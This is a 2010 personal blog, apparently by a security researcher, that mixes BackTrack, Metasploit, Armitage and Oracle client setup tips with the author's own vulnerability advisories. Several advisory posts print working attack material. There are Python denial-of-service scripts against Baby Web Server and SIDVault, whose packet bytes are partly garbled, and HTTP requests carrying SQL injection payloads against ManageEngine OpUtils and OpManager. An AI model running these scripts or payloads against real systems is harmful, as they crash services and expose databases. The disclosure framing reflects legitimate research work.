Wednesday, December 15, 2010

Problem in Installation - Armitage

Problem while Connection Mysql Database

solution

1)msf > db_driver

2)msf > db_driver mysql

3)root@bt:/pentest/exploits/framework3# mysql -u root -p

4)mysql> CREATE USER msf3@localhost IDENTIFIED BY 'test';

5)mysql> CREATE DATABASE msf3;

6)mysql> GRANT ALL PRIVILEGES ON msf3.* TO msf3@localhost;


Another Problem while Installing if you are using sqlite3
then

root@bt:/pentest/exploits/armitage# ./armitage.sh

password is blank i.e

DB Connect String -

Armitage Setup

To install Armitage in BackTrack,

1)root@bt:~# apt-get update

2)root@bt:~# apt-get install armitage

3)root@bt:~# msfrpcd -f -U msf -P test -t Basic

4)root@bt:~# /etc/init.d/mysql start



5)root@bt:/pentest/exploits/armitage# ./armitage.sh


In BackTrack, the default MYSQL credentials are root / toor and for PostgreSQL,
if using sqlite3 credential is blank password

6)select the "Use SSL" checkbox, verify the rest of the settings and click "Connect".

Saturday, September 25, 2010

Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities

Detail of POC can be viewed
http://www.exploit-db.com/exploits/15061/
http://www.securityfocus.com/bid/43345/info

Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
by

Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 18th Sep 2010

# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities such as buffer overflow, integer overflow and denial of service (IE crash). This issue is triggered when an attacker convinces a victim user to visit a malicious website.

The "GetLicenseFromURLAsync" function does not handle input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the remote compromise of affected computers. Faile exploit attempts likely result in browser crashes.

Detail of POC can be viewed
link:http://www.exploit-db.com/exploits/15061/
link:http://www.securityfocus.com/bid/43345/info

Wednesday, August 18, 2010

Problem :No Internet in Backtrack 4

Problem :No Internet in Backtrack 4 BT4

1)start the Network ..

In command line type
bt# /etc/init.d/networking start

or Menu -> Services -> NETWORK -> Start NETWORK

Then Configure Network Card

Static IP address

ifconfig eth0 192.168.1.2

For variable subnet mask
ifconfig eth0 192.168.1.2 netmask 255.255.255.224


Add a default gateway:

route add default gw 192.168.1.1 eth0

Replace the IP address with your default gateways


Assign DNS servers:

echo nameserver 200.1.1.1 > /etc/resolv.conf


For DHCP

dhcpcd eth0

Metasploit db_create error

msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.

Solution
Just use


msf > db_driver sqlite3

or
msf > db_connect

Sunday, June 13, 2010

Installing Oracle Client using TOAD

1)Install the oracle instant client. (instantclient_10_2)
Unzip the files to a directory, and then copy the path of this directory to the clipboard.

2)Add this directory to the PATH environmental variable.
right click on My Computer, go to the Advanced tab, and click 'Environment Variables'. Under System variables, find 'Path'. Select it, and click edit. ctrl-v to paste the directory into the string, and say OK. e.g.:

Before:C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\

After: C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\;C:\instantclient_10_2


3)In the same window, under 'User variables for ...', Click the New button. Call the variable 'TNS_ADMIN'. ctrl-v to paste the directory path into the 'variable value' field. Say OK, and close out the 'My Computer' properties windows.

e.g Varaible name TNS_ADMIN
variable value C:\instantclient_10_2


4)Create a file called 'TNSNAMES.ORA' in your instant client installation directory. In this file designate the connection parameters for your database. Mine looked something like this:

DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)

replace the DB_ALIAS, ip.add.re.ss, port, and SID with your settings.


5)Reset your computer, fire up Toad, and then open a new connection. You should see DB_ALIAS as an option under the database field. Set your username and password, hit connect

Friday, March 5, 2010

File association fixes for Windows Vista

his page contains the file association fixes for some of the most common file types. The fixes are applicable for Windows® Vista systems only.

http://www.winhelponline.com/articles/105/1/File-association-fixes-for-Windows-Vista.html


Broken EXE Association

Executable (.EXE) files are the programs you run for most tasks on a computer. Now and again someone reports that they have, in error, assigned some other program to the .EXE extension without first establishing a System Restore Point so they can recover from making this error. When that happens little will run on the computer. Instead, when an .EXE file is clicked some program will start and attempt to process that file instead.

http://filext.com/faq/broken_exe_association.php

Wednesday, March 3, 2010

Opera (plenitude String )Denial of Service Exploit

http://www.packetstormsecurity.org/1003-exploits/operaplen-crash.txt
http://www.exploit-db.com/exploits/11617


=======================================================================

Opera (plenitude String )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download http://www.opera.com/download/


#Background

Opera is a popular internet browser :)

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.



#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox




Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.


#If you have any questions, comments, or concerns, feel free to contact me.

Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit

link:http://www.exploit-db.com/exploits/11617
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt

for code

=======================================================================

Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
MOzilla Crash :)


#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data

open in Mozilla Firefox and wait for 15 sec ...... :) and say Good Bye

Mozilla .......

Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di

Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!



BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!

Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain.

#If you have any questions, comments, or concerns, feel free to contact me.

Thursday, February 18, 2010

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281


for code visit above link as no script allow in blogger



=======================================================================

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact

Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any might be lost

#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

========================================================================================================================

asheesh.html
========================================================================================================================

asheesh kumar mani tripathi









========================================================================================================================




#If you have any questions, comments, or concerns, feel free to contact me.






Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

asheesh.html
========================================================================================================================


asheesh kumar mani tripathi





========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt

================================================================================

ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================

#Date-3/2/10
# code by Asheesh kumar Mani Tripathi

# AKS IT Services

# Credit by Asheesh Anaconda


#Download http://www.manageengine.com/products/oputils

#Vulnerbility
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database


========================================================================================================================

Request
========================================================================================================================

POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0



========================================================================================================================
Response
========================================================================================================================


HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583

Sunday, January 24, 2010

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

Blind SQL/XPath injection in OPMANAGER

Blind SQL/XPath injection in OPMANAGER
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289


Exploit Code

*******************************Blind SQL/XPath injection in OPMANAGER***********************************




# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]



Description

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Vulnerable:

http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0


Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache

Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8

Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability

Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942

Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket

print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"

SIDVault Remote Denial of Service

#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop #responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.

#!/usr/bin/python

#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda

# Group DarkShinners


import sys
import socket

addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket +=
'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()